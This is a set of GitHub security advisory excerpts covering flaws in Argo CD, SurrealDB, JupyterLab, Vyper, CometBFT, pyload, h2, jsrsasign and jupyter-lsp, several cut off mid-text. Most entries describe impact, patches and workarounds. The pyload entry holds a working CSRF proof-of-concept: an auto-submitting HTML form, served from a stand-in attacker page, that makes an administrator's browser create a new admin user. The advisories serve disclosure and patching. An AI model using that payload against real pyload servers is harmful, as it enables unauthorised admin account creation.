ghsa

### Impact The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.16 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain, such as [https://argo-cd.internal.example.com](https://argo-cd.example.com/). If an a...

SurrealDB depends on the `tungstenite` and `tokio-tungstenite` crates used by the `axum` crate, which handles connections to the SurrealDB WebSocket interface. On versions before `0.20.1`, the `tungstenite` crate presented an issue which allowed the parsing of HTTP headers during the client handshake to continuously consume high CPU when the headers were very long. All affected crates have been updated in SurrealDB version `1.1.0`. From the original advisory for [CVE-2023-43669](https://nvd.nist.gov/vuln/detail/CVE-2023-43669): "The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes)." ### Impact A remote unauthenticated attacker may cause a SurrealDB server that exposes its WebSocket...

### Impact Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. ### Patches JupyterLab 4.1.0b2, 4.0.11, and 3.6.7 were patched. ### Workarounds No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. ### References Vulnerability reported by user @davwwwx via the [bug bounty program](https://app.intigriti.com/programs/jupyter/jupyter/detail) [sponsored by the European Commission](https://commission.europa.eu/news/european-commissions-open-source-programme-office-starts-bug-bounties-2022-01-19_en) and hosted on the [Intigriti platform](https://www.intigriti.com/).

### Impact The vulnerability depends on user interaction by opening a malicious notebook with Markdown cells, or Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. ### Patches JupyterLab v4.0.11 was patched. ### Workarounds Users can either disable the table of contents extension by running: ```bash jupyter labextension disable @jupyterlab/toc-extension:registry ``` ### References Vulnerability reported via the [bug bounty program](https://app.intigriti.com/programs/jupyter/jupyter/detail) [sponsored by the European Commission](https://commission.europa.eu/news/european-commissions-open-source-programme-office-starts-bug-bounties-2022-01-19_en) and hosted on the [Intigriti platform](https://www.intigriti.com/).

### Summary `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. Tracked in issue https://github.com/vyperlang/vyper/issues/3737 ### Details The `build_IR` allocates a new internal variable for the concatenation: https://github.com/vyperlang/vyper/blob/3b310d5292c4d1448e673d7b3adb223f9353260e/vyper/builtins/functions.py#L534-L550 Notice that the buffer is allocated for the `maxlen` + 1 word to actually hold the length of the array. Later the `copy_bytes` function is used to copy the actual source arguments to the destination: https://github.com/vyperlang/vyper/blob/3b310d5292c4d1448e673d7b3adb223f9353260e/vyper/builtins/functions.py#L569-L572 The `dst_data` is defined via: ...

## Summary A vulnerability in CometBFT’s validation logic for `VoteExtensionsEnableHeight` can result in a chain halt when triggered through a governance parameter change proposal on an ABCI2 Application Chain. If a parameter change proposal including a `VoteExtensionsEnableHeight` modification is passed, nodes running the affected versions may panic, halting the network. The CometBFT team addressed this issue by improving validation logic for the `VoteExtensionsEnableHeight` to correctly handle governance proposals addressing this parameter. ## Next Steps for Impacted Parties If you are a chain developer with an active network running on CometBFT v. 0.38.x, we recommend updating your chain application to v0.38.3 or later of CometBFT to patch this issue. This issue can be resolved with a “soft patch” to an active network, i.e. nodes can be patched and restarted at different times without the need for a coordinated upgrade that halts a chain. If this patching methodology is used, ...

### Summary The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user. ### PoC We host the following HTML file on an attacker-controlled server. ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` If we now trick an administrator into visiting our malicious page at `https://attacker.com/CSRF.html`, we see that their browser will make a request to `/api/add_user/%22hacker%22,%22hacker%22`, adding ...

An attacker with an HTTP/2 connection to an affected endpoint can send a steady stream of invalid frames to force the generation of reset frames on the victim endpoint. By closing their recv window, the attacker could then force these resets to be queued in an unbounded fashion, resulting in Out Of Memory (OOM) and high CPU usage. This fix is corrected in [hyperium/h2#737](https://github.com/hyperium/h2/pull/737), which limits the total number of internal error resets emitted by default before the connection is closed.

### Impact RSA PKCS#1.5 or RSAOAEP ciphertexts may be decrypted by this Marvin attack vulnerability. ### Patches update to jsrsasign 11.0.0. ### Workarounds Find and replace RSA and RSAOAEP decryption with other crypto library. ### References https://people.redhat.com/~hkario/marvin/ https://github.com/kjur/jsrsasign/issues/598

### Impact Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. Please note this vulnerability is in the extension and is patched in version 2.2.2 of that extension. This extension has been updated in jupyterlab-lsp version 5.0.2. ### Patches Version 2.2.2 has been patched. ### Workarounds Users of jupyterlab who do not use jupyterlab-lsp can uninstall jupyter-lsp. ### Credits We would like to credit Bary Levy, researcher of pillar.security research team, for the discovery and responsible disclosure of this vulnerability.